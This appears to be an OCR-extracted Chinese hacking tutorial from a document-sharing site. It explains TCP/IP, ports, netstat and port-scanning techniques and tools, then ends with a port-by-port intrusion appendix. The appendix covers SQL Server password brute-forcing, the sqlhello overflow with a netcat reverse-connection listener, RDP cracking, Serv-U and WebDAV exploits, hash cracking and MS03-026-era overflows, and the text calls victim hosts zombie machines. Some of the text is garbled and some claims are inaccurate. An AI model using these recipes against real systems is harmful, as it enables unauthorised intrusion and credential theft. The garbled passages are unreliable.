端口知识篇

上传人:jin****ng 文档编号:229170837 上传时间:2023-08-22 格式:DOCX 页数:9 大小:27.84KB
收藏 版权申诉 举报 下载
端口知识篇_第1页
第1页 / 共9页
端口知识篇_第2页
第2页 / 共9页
端口知识篇_第3页
第3页 / 共9页
资源描述:

《端口知识篇》由会员分享,可在线阅读,更多相关《端口知识篇(9页珍藏版)》请在装配图网上搜索。

1、关于 TCP/IPTCP/IP 协议簇应用层 TELNET FTP SMTP SNMP DNS RTP 这就是应用层他这层的协议 HTTP 用来传递制作 WWW 万维网文件 FTP 用于交互式文件传输 SMTP 邮件传输 SMTP 邮件传输 比如 DNS 域名解析 这个 DNS 的作用有朋友应该还不知道 比如 他的作用就是当你 输入WWW。BAIDU。COM的时候 让你根据这个域名可以访问到IP简单来讲DNS就是这样 还有RIP路由协议也是这层 用于交换路由信息的什么叫路由呢 简单拿路由器来说 为什么会有路由器这个东西 因为 路由器可以连接 2个以上的不同网段 我只抓重点 应用层 容易出现的漏

2、洞比如 netbios windows sockets 前者大家应该很多都知道 因为以后要提 这里不描述了 后者 windows sockets 比如我们的标准程序接口方面的漏洞 (API ) 这是应用层 大家看下看完以后 我们一会讲 传输层 传输层T C P U D P 这就在于是传输层传输层是负责提供对话和信息包 通讯服务的协议层 这是他总的概念.他包括了两个 你们可以看下我的讲义有TCP和UDP,TCP提供的是一对一的面向连接的通讯服务他是可靠的也就是 说他有个发包和收包的顺序 防止信息包的丢失 .而 UDP 提供的是一对一或者一对多 无连接的 不可靠的 通信服务 他不管信息包是否可以正

3、常到达 .根据以上 我们可以选择 就是说 如果你 的硬件环境相对可靠的情况下 可以用 UDP 如果你的硬件环境不可靠的话 可以用 TCP 互补 我们 TCP/IP 的协议层 包括了 OSI 7 层里面的 传输层和对话层还有学生问过我为什么老是提OSI,我们现在虽然老是在用TCP/IP但是TCP/IP他的主要目的是共享也就是 现在漏洞太多的原因,而 OSI 是一个完美的模型 但就象世界和平 从来都没达到过 不过我们还是 要用它来研究这是传输层 大家看下完了 我们继续网络互联层 网络互联层 ARPIGMP ICMP 这就是互联层网络互连层 他的作用是寻址 包装和路由功能。 包括的内容呢 大家也看到

4、了 我的讲义里面有IP协议ARP协议IGMP和ICMP这三个协议,我这里具体说下这四个协议 让大家更好的了 解下这个层首先IP协议 又称为in ter net协议 负责IP寻址 数据包的分解和重组.寻址我就不讲了 大家应该都知道 我讲下分解和重组因为数据包是从最上面协议船到最下面 然后再传到对方的最下层 就象两个公司的老总要见面 是一个老总给自己的秘书 秘书再给员工 员工给对 方员工 对方员工再对方秘书 再给他们老总.而数据包 从上到下 每经过一层 都要进行自己这 层的一个数据的重组也就是要加包头信息表示已阅里面包含了对方的IP地址等等信息,这 是IP协议.再说下ARP协议,ARP是地址解吸协

5、议负责网络接口层地址的网络互连地址解析比如我们网卡的物理地址 也就是MAC地址CMD下可以用.ICMP INTERNET控制信息协 议 他是一个诊断协议 我讲义上也讲了,在判断的时候 有人会喊 ping 一下,就是用这个协议,他是报告 关于IP数据包传诵的错误或者信息.IGMP是in ter net组管理协议负责IP多点传送组的管理这个协议比较难理解如果不能理解请去网上找适合的教程.这个层相当于OSI的网络层.网络互联层完毕 没问题的话 继续了 网络接口层 以太网 令牌环 帧中继 ATM 这个就是网络接口层.也是TCP/IP的最下面一层他包含的内容以太网 令牌环 帧中继ATM.他主要负责网络介

6、质中 发送TCP/IP数据包和接受远程网络介质的TCP/IP数据包.但他和7层模型的数据连路层还是有 区别的这个区别这里不讲了大家可以找资料看看是个顺序和应答的区别.TCP/IP协议就是这些东西 下面就是 IP 地址了 因为我要照顾大多数请知道的朋友再看一遍吧.对比下边的图大家可以更好的理解内容 应用层以及各个层的解析 这里不手了 网上很多 大家可以看看 并且要和 OSI7 层模型对比下 把每层大概的作用要记住 还要记住每层可以出现的攻击 也就是你所知道的网络渗透和攻击都 属于哪一层IP的分类ABC类的分法和子网掩码的换算TCP 的 6 个标志字段 因为后面要用到 这里说下URG (Urgen

7、t):紧急指针字段有效。ACK (Acknowledgment):确认字段有效。PSH (Push function):本报文段请求推操作。RET (Reset the connection ): 连接复位。SYN (Synchronize sequenee numbers):序歹U同号。FIN (No more data from sender):发送方字节流结束。a 倒看不到图大家只能点击看了这个是网络层次比较图,结合上边的内容可以直观的理解内容 img: IP 地址方面 如果你不是网络管理员的话 子网掩吗就不要研究了 他是用来限制主机树的,不过如果可以还是最好知道 因为可以知道你肉机的网

8、内大概多少主机 如果他的子网掩吗不是默认的话.我们这里说下IP地址的分类,IP地址大家应该比较熟悉.一共32位,分四个部分,呵呵 说说什么是位吧.大家应该知道 计算机所能识别的语言 是0 -1 的2进制.也就是说 我们所打的编 码 在最底 要哗成 01 排列的 2 进制 而 比如 8 用 2 进制表示 就是 1000, 而 1000 就是 4 位,现在知道什么是位了吧.我们的IP地址用2进制表示就是32位,每8位为一部分.有人问是怎么 换算,换算就是 2 进制和10进制之前的换算了,这个不用我这里教吧呵呵.不会的话去查资料.象我们平时的 比如192。168。18。1 这个是十进制表示的,具体

9、2-10 怎么换算,自己找下资料了 好吗 这里就不说了大家可以看见我刚大的 IP 我们划分就是通过前面来判断.不会超的 32 位 8个为一部分 也就是 8 个都为 1 就是最大 11111111 换成 10 进制=255,所以 IP 最大 就是 255。255。255。255当然IPV6不在我们考虑范围,因为还在开发中.换算就是2进制和10进制之间的 换算了.A类是0-127而0。0。0。0保留127也保留一个是本机一个是回路B类128-191C 类 192-223IP 讲起来太麻烦了 你们就记住 A-C 网络数越来越都 而主机数越来越少也就是A类的网数最多但每个网里面可以包含的主机最少我们把

10、一个 IP 话成 4 个部分 1 2 3 4A类地址1部分表示网络数2 3 4表示主机数B 类地址1 2 部分表示网络数 34 表示主机数C类地址12 3部分表示网络数4表示主机数然后还有子网掩吗大家只要记住它就是用来限制主机树的就OK IP就到这里,对了还有个要补充差点忘了,就是每个网段都有自己的私网地址.私网地址也可以称为非路由地址,也就是说 是保留地址 作为私有IP空间的.问:是不是一个局域网里自己设的那个ip啊.答:是的.我解释下 广播地址和私网,今天我就把广播地址解释了 就打住吧.广播地址 很简单 我先讲讲什么叫广播,在CISCO设备上有个概念叫泛洪 如果有学设备的 我这里顺便对比讲

11、下,比如现在 有个信息包进来 从我们交换机某个端口进来 他要寻质如果事先没有地址 那么他就会给没个 端口发信息 包括自己,来求证 是否是对方.所以交换机不能屏蔽广播 而路由器可以 因为他有 记忆功能,可以形成路由表.而设备上的泛洪 呢 他的意思是 给所有断口发 除了自己 大家对比记下这两个概念而我们IP地址上的广播地址的概念 我刚讲过IP地址是由2进制组成 当全 为一时 表示广播地址.广播地址 主机都为1.主机全为0的话 是网段 表示一个网.广播是255.具体关于IP的大家还是找资料看看,看具体点便于以后学习刚才讲的TCP/IP协议簇很重要大家一定要弄明白关于端口从逻辑角度来讲端是指TCP/I

12、P中的端。端号的范围是从065535 。比如说用与浏览 网页服务的80端,用于FTP服务的21端等。换句话说,一个端就是计算机连接网络或 者服务器的一个出入口,是用户与网络计算机进行交流的方式。端可以按照端号来分类,分 为知名端(well-konwn por ts )和动态端(Dynamic por ts )。知名端就是众所周知的 端号,范围是从01023,这些端号一般是固定分配给一些服务。比如21端分配给FTP(文件传输协议),23端分配给telnet (远程登陆)服务,80端分配给HTTP (超文本传 输协议)服务,135端分配给RPC (远程过程调用)服务等。而动态端是指不固定分配给 某

13、个服务的,用户也可以自己定义,范围是从102465535 。黑客平时使用的一些后门,木马 都是使用动态端的。不过,由于网络技术的飞速发展,现今,端复用及反向连接后门也在不 断推出。查看端,可以使用netstat命令。依次单击“开始一运行”命令,键入“ cmd ”并按下回车键,系统便会打开命令提示符窗口。 在命令提示符下,继续键入“netstat -a -”,按下回车键后就可以看到以数字形式显示的TCP 和UDP连接的端号及其状态。netstat 命令解释命令格式如下 netstat -a -e -n -o -s-a表示显示所有活动的TCP连接以及计算机监听的TCP和UDP的端口。-e 表示显示

14、以太网发送和接受的字节数、数据包数等。-n表示只以数字形式显示所有活动的TCP连接的地址和端号。-o表示显示活动的TCP连接并包括每个连接的进程ID (PID )。-s表示按协议显示各种连接的统计信息,包括端号。值得注意的端有:21、22、23、25、79、80、109、110、135、139、445、1433、3389 和8080,扫描时建议大家优先考虑这些端口。关于扫描扫描的目的就是得到对方主机的各种数据,如系统类信息,对方主机开了哪些端口,在这些端口 上运行了什么服务等。扫描技术的实现方式TCP方式又叫全TCP连接或是TCP connect ()扫描。它是长期以来TCP端口扫描的基础。c

15、 o n n e c t ( )要么获得成功,否则就返回-1,表示端口不可访问。这种扫描方法很容易被检测出来(在日志文件中会有大量密集的连接和错误记录)。另外,TCP Wrapper可以对连接请求进行控制,所以它可以用来阻止来自不明主机的全连接TCP扫描。SYN方式叫做“TCP SYN”扫描。此技术通常被认为是“半开放”扫描,因为TCP connect() 扫描需要建立一个完整的 TCP 连接,这样很容易被对方发现,而 SYN 扫描不必打开一个完全的 TCP连接。扫描程序发送一个SYN数据包,就好象准备打开一个实际的连接并等待ACK 一样。 如果返回SYN|ACK,表示端口处于侦听状态;如果返

16、回RST,就表似乎端口没有处于侦听状 态。特点SYN比TCP快,TCP比SYN更全面。秘密扫描技术,由于这种技术不包含标准的 TCP 三次握手协议的任何部分,所以无法被记录下 来,从而比 SYN 扫描隐蔽得多。此外秘密扫描使用 FIN 数据包来探听端口,而 FIN 数据包能 够通过只监测SYN包的包过滤器。秘密扫描通常适用于UNIX主机,在Windows NT环境下, 该方法无效,因为不论端口是否打开,操作系统都发送RST。跟SYN扫描类似,秘密扫描也需 要自己构造IP包。此外还有间接扫描、认证扫描和代理扫描等,因为不太常用,这里就不做更 深入的介绍了。还有一种常见的扫描技术就是 Ping 扫

17、描。平时我们在网络出问题的时候经常会听到有人喊“ping 一下。”就是指这个的。如果需要扫描一个主机甚至是整个子网的成千上万个主机的时 候,首先判断一个主机是否开机就非常重要了。这就是 Ping 扫描的目的。它主要由以下两种方 法来实现的。真实扫描:例如发送ICMP请求包给目标IP地址,用相应的回答来表示主机是否开机。TCPPing: 例如发送特殊的 TCP 包给通常都打开且没有过滤的端口(例如 80 端口)。对于没 有root权限的扫描者,得使用标准的connect来实现Ping 命令用于确定本地主机是否能于另一台主机交换(发送与接受)数据报。按照缺省设置,Wi ndows上运行的Pi ng

18、命令发送4个ICMP (in ter net控制信息协议)回送请求,每个有32 字节数据。如果一切正常,应能得到4个回送应答。 Ping 能够以毫秒为单位显示发送回送请求 到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接, 速度比较快。Pi ng命令还能显示TTL(time to live,存活时间)值。下面来看一下 Ping 命令的用法-t是等待用户去中断测试,否则就会常Pi ng不止,这就是所谓的DOS攻击。-l 后接 Ping 数据包的大小(165500)-n 后接 Ping 的次数-a 名称解析当然还有其他一些参数,大家开始在 WINDOWS 帮助中

19、查看。还可能会遇到一种情况就是发现 ping很多IP地址,都没TTL回来,显示“Time out”,这是因为管理员在服务器上设置了防 Pin g,一般常用的网络防火墙都有这样的功能。扫描软件介绍:X-SCAN:这应该是大家必备的软件。安全焦点出品,采用多线程对指定IP地址段、单机进行 安全漏洞检测,支持插件功能,提供了图 形用户界面和命令行两种操作方式,漏洞信息 比较详细。流光: 大家都应该听说过,其速度快,对有些漏洞可直接利用(自带有工具存放在 TOOLS 文 件夹中)。对新手来说,界面简单易懂。SuperScan3.0:扫描起中的利器,速度非常快,而且能很好的捕捉端口提示信息(banner

20、), 可以间接判断对方操作系统的信息或服务软件的类型Nmap:号称扫描之王。Nmap本是UNIX环境下的软件,现在被移植到了 Windows平台, 它是一款功能强大的工具,在新版本中也配置了图形用户界面。 Nmap 是一款针对大型网络的 端口扫描工具,尽管它也适用于单机扫描。在不同情况下,你可能需要隐藏扫描,越过防火墙或 者使用不同的协议进行扫描,比如UDP、TCP、ICMP等。Nmap支持Vanlilla TCP connect 扫描、TCP SYN (半开式)扫描、TCP FIN、Xmas或NULL (隐蔽扫描)、TCP ACK和窗口 扫描、UDP监听ICMP端口无法送达扫描、ICMP扫描

21、、TCP ping扫描、直接RPC扫描(无 端口映射)、 TCP/TP 指纹识别远程操作系统,以及相反身份认证扫描等。 Nmap 同时支持性能 和可靠性统计。X-way: 款融合许多优秀功能于一身的多线程扫描工具,同时也是一款功能众多的攻击器。 Shadow Security Scanner :俄罗斯安全界非常专业的安全漏洞扫描软件,具有安全扫描、 口令检查、操作系统检查等强大功能。Retina Network Security Scanner : eeye工具出品的网络安全扫描产品,强大的网络漏洞 检测技术可以有效的检测并修复各种安全隐患和漏洞,并且生成详细的安全检测报告。它兼容各 种主流操

22、作系统,防火墙、路由器等网络设备。THC-Amap: 运行在 Linux/UNIX 平台上的新一代安全扫描软件。它通过探测端口响应的应 用程序指纹数据来识别应用程序和服务,远甚于通过缺省端口号来判断应用程序和服务的方法, 并具有完美的 SSL 支持、完整的 RPC 探测等特点。21- FTP 文件传输协议: FTP 服务同 telnet 服务一样,是可以匿名登陆的,而且在有的计算机 上它还允许你执行远程命令。另外,有时还能用它获得一个可用的帐户(一般是Guest),或者 可以得知主机在运行什么系统。另外现在做FTP服务器大都使用Serv-U这种软件,但从Serv-U 6.0全部有适用漏洞(溢出

23、工具已经有了)。用X-Scan扫21端口,观察banner信息,就可 以确定是否为Serv-U,如果使用SSS甚至可以直接把Serv-U的版本都罗列出来,以后再谈。22- SSH远程登陆协议:SSH是英文Secure Shell的简写形式。通过使用SSH,你可以把所 有传输的数据进行加密,而且也能够防止 DNS 欺骗和 IP 欺骗,类似的安全协议还有 SSL 和 S-HTTP。使用SSH,有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的 速度。SSH有很多功能,它既可以代替Telnet,又可以为FTP、POP甚至为PPP提供了一个 安全的“通道”当然这个服务也有很多弱点:如果配置

24、成特定的模式,许多使用RSAREF库的 版本会有不少漏洞。感兴趣的朋友可以进一步研究,不过我不建议新手一开始就注意这个端口。23- Tel net终端仿真协议:这个协议真是利用的很多,大家需要好好研究一下。用它可以登陆到 任何一个主机。这种不用密码的远程登陆服务是很危险的,如果可以匿名登陆,任何人都可以在 服务器端和客户端之间发送数据。以后再谈25-SMTP 简单邮件传送协议:主要用于发送邮件,如今大多数邮件服务器都使用该协议。利用 25端口,可以寻找 SMTP 服务器,用来转发垃圾邮件(现在这种行为是犯法的)。这个端口也 是很多的木马会经常使用的,值得我们注意。79- Finger 查询远程

25、主机在线用户信息: Finger 服务对入侵者来说是一个非常有用的服务,从 它可以获得用户信息,查看计算机的运行情况等。大家可以用Fin ger命令探测信息,格式如下 finger -l userip其中-L是以长列表格式显示用户信息,user是指定要获得与其相关的信息的用户。如果忽略 USER参数,fin ger将显示指定计算机上所有用户的信息,IP就是要探测的那台计算机的IP。 这个端口现在的利用很少,因为大家都注意安全了。80- WWW信息网超文本传输协议:WWW服务在该端口运行。关于这个端口,刺探信息的时候会用到。以后再谈109 和 110 109 端口是 POP2 (Post Pro

26、tocol Version2 邮局协议 2)服务开放的,110 端 口是POP3 (邮件协议3)服务开放的。POP2, POP3都是主要用于接收邮件的。目前POP3 使用的比较多,但利用起来也不是很容易。113-这个端口主要用于Windows的“Authentication Service (验证服务)”。这个端口虽然 可以方便身份验证,但是也常常被称作为FTP、POP、SMTP、IAMP以及IRC等网络服务的记 录器,这样就预示着它会被相应的木马程序所利用,比如基于 IRC 聊天室控制的木马(现在已 经很少见了)。另外(现在已经很少见了)。另外, 113 端口还是 Invisible Ide

27、ntd Deamon、 Kazimas等木马默认开放的端口。135-这个端口主要用于RPC(Remote Procedure Call,远程过程调用)协议并提供DCO (分 布式组件对象模型)服务。大家还记得风靡一时的冲击波吗?就是利用这个端口。139-445 这两个端口非常重要, 139 是为 NetBIOS Session Service 服务提供的;445 端 口是NT共享资源的端口,我们可能会碰到NT弱口令(在国内依旧不能排除这种可能性),它 可能要用到NET命令。1433-Microsoft SQL SERVER 的默认端口。如果可以拿到 SA(System Administrato

28、r, 系统管理程序)权限,就好比是拿到了服务器的权限。SA空口令的情况在国内仍是一个比较普 遍的安全问题。3389-终端服务:相信大家都经常听到这个端口。利用 139、 445 端口扫描出来的弱口令就可 以在这里登陆了。以后会给这方面资料附件:这里给一些关于端口的入侵软件名称,但记住 漏洞是暂时的,知识才是永恒的。原理最 重要。攻是为了更好的防。1. 1433 端口入侵scanport.exe 查有 1433 的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对 sql 的 sp2 及以下的系统,可用 sql 的 hello 溢出漏洞入侵。nc -

29、vv -l -p 本机端口 sqlhelloF.exe 入侵 ip 1433 本机 ip 本机端口(以上反向的,测试成功)sqlhelloz.exe入侵ip 1433 (这个是正向连接)2. 4899 端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899 的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对 2000 的机器,可以试试字典暴破。 (tscrack.exe)4. 80 入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。(小榕的注入软件)。5

30、. serv-u 入侵(21 端口)对5. 004及以下系统,可用溢出入侵。(serv5004.exe)对5 . 1 . 0 . 0及以下系统,可用本地提升权限。 (servlocal . exe)对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554 端口用 real554.exe 入侵。7. 6129 端口用 DameWare6129.exe 入侵。8. 系统漏洞利用 135、445 端口,用 ms03026、ms03039、ms03049、ms04011 漏洞, 进行溢出入侵。9. 3127 等端口可以利用doom 病毒开的端口,用nodoom.exe入侵。(可用 mydoomscan.exe查)。10. 其他入侵利用shanlu的入侵软件入侵(WINNTAutoAttack.exe

展开阅读全文
温馨提示:
1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
2: 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
3.本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!